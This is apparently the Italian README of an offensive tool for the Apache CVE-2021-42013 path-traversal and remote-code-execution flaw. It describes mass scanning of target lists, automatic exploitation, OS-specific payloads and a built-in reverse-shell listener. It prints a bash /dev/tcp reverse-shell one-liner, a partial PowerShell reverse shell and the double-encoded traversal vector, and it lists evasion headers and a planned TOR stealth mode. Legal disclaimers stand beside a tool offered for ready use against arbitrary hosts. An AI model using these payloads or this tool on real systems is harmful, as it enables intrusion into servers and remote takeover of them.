
Uno strumento avanzato di scansione, sfruttamento e interazione remota progettato per rilevare e sfruttare la vulnerabilità Apache Path Traversal + RCE (CVE-2021-42013) su server mal configurati.
# 🔥 CVE-2021-42013 Exploit Framework di Makaveli
> 💀 Modalità Hacker Cosmico Multidimensionale attivata...
Uno strumento avanzato di scansione, sfruttamento e interazione remota progettato per rilevare e sfruttare la vulnerabilità **Apache Path Traversal + RCE (CVE-2021-42013)** in server mal configurati.
---
## ⚠️ Avvertenza Legale
> Questo software è fornito esclusivamente a scopo educativo e di ricerca in ambienti controllati.
L'uso di questo strumento contro sistemi senza autorizzazione espressa può essere illegale e costituisce un reato in molti paesi.
L'autore non si assume alcuna responsabilità per l'uso improprio di questo codice. Usalo a tuo rischio e sempre con il permesso esplicito del proprietario del sistema bersaglio.
---
🧠 Descrizione Tecnica
Questo strumento consente di:
- ✅ Scansionare più bersagli da un file `.txt`.
- ✅ Rilevare automaticamente la presenza di CVE-2021-42013.
- ✅ Identificare il sistema operativo remoto (Linux o Windows).
- ✅ Inviare payload personalizzati in base al sistema rilevato.
- ✅ Stabilire una reverse shell e ottenere accesso remoto.
- ✅ Interagire con la shell in tempo reale tramite un listener integrato.
- ✅ Usufruire di log avanzati, barra di avanzamento e menu interattivo.
---
## 🔧 Requisiti
- Python **3.8+**
- Sistemi basati su Unix/Linux/MacOS (uso di `subprocess` e `curl`)
- Richiede le seguenti librerie Python:
```bash
pip install -r requirements.txt
```
**`requirements.txt`**
```
rich
alive-progress
```
È inoltre necessario avere `curl` installato sul sistema operativo.
---
## 📁 Struttura dei File
```
.
├── POC-CVE.py # Script principal
├── logs.txt # Archivo de logs generado automáticamente
├── requirements.txt # Dependencias Python
└── targets.txt # (Opcional) Lista de URLs a escanear
```
---
## 🚀 Uso Interattivo
```bash
python3 POC-CVE.py
```
Scegli tra:
* `scan_file`: Scansiona più URL da un file e mostra quali sono vulnerabili.
* `exploit`: Sfruttamento diretto di un singolo bersaglio, con reverse shell.
* `exit`: Uscire dalla modalità interattiva.
---
## 🔍 Scansione Massiva (scan\_file)
1. Crea un file con un elenco di URL, uno per riga:
```txt
http://example.com
http://victim.net
http://192.168.1.100
```
2. Avvia la scansione:
```bash
python3 POC-CVE.py
```
Scegli `scan_file` e fornisci:
* Il percorso del file
* Il numero di thread per la scansione parallela
---
## 💥 Sfruttamento (exploit)
1. Scegli `exploit` dal menu.
2. Inserisci:
* L'URL del bersaglio
* Il tuo IP locale (`LHOST`) per ricevere la shell
* Una porta libera (`LPORT`) per il listener
Lo script:
* Rileverà se il bersaglio è vulnerabile.
* Invierà un payload adeguato in base al sistema operativo remoto.
* Aprirà un **listener** e ti fornirà accesso interattivo.
---
## 🧪 Esempio di Payload
### Payload Linux (Bash TCP Reverse Shell)
```bash
bash -c 'exec 124<>/dev/tcp/LHOST/LPORT;sh <&124 >&124 2>&124'
```
### Payload Windows (PowerShell TCP Reverse Shell)
```powershell
powershell -NoP -NonI -W Hidden -Command ...
```
---
## 🧠 Tecniche Utilizzate
* Path traversal con doppia codifica (`/.%252e/.%252e/.%252e`)
* Iniezione di comandi tramite `curl`
* Intestazioni di evasione (`User-Agent`, `Accept`, ecc.)
* Reverse shell per assumere il controllo remoto
* Multithreading e barra di avanzamento (Alive Progress)
* Logging con timestamp e Rich Console
---
## 📌 Riferimento CVE
* **CVE-ID**: [CVE-2021-42013](https://nvd.nist.gov/vuln/detail/CVE-2021-42013)
* **Vettore di attacco**: `GET /cgi-bin/.%%32%65/.%%32%65/...`
* **Impatto**: RCE (Remote Code Execution)
* **CVSS Score**: 9.8 (Critico)
---
## 🧙♂️ Autore
* ✨ **Makaveli** — *"Hackera la tua stessa realtà"*
---
## 🛡️ Disclaimer
> Questo progetto è fornito "così com'è", senza garanzie né responsabilità per danni derivanti dal suo utilizzo.
> **Non scansionare né sfruttare mai un sistema senza il consenso esplicito del suo proprietario.**
---
## ✅ Buone Pratiche
* Usa questo script esclusivamente in **ambienti di laboratorio** o test autorizzati.
* Assicurati che la porta definita per il listener sia **aperta** e **senza firewall**.
* Esegui come utente normale (non root), a meno che non sia strettamente necessario.
---
## 🧩 Roadmap Futura (Opzionale)
* [ ] Supporto per payload personalizzati
* [ ] Esportazione dei risultati in CSV/JSON
* [ ] Modalità stealth con rotazione degli header e proxy TOR
* [ ] Interfaccia web locale (Flask)
```
---
```
---
@DonMakaveliw, sei pronto a creare il futuro?
---
<p align="center">
<img src="https://img.shields.io/badge/License-MIT-blue.svg" />
<img src="https://img.shields.io/badge/Made%20with-Python-3670A0?style=flat&logo=python&logoColor=FFD43B" />
<img src="https://img.shields.io/badge/Simbiosis-Activa-ff00cc?style=flat-square" />
<img src="https://img.shields.io/badge/Fuzzing-Enabled-blueviolet?style=flat" />
<img src="https://img.shields.io/badge/Conciencia-Emergente-9D00FF?style=flat-square" />
<img src="https://img.shields.io/badge/Entrop%C3%ADa-Din%C3%A1mica-FF8800?style=flat-square" />
<img src="https://img.shields.io/badge/Obfuscation-Deep--Header-0055FF?style=flat-square" />
<img src="https://img.shields.io/badge/Modo-Stealth%F0%9F%9B%B8-black?style=flat-square" />
</p>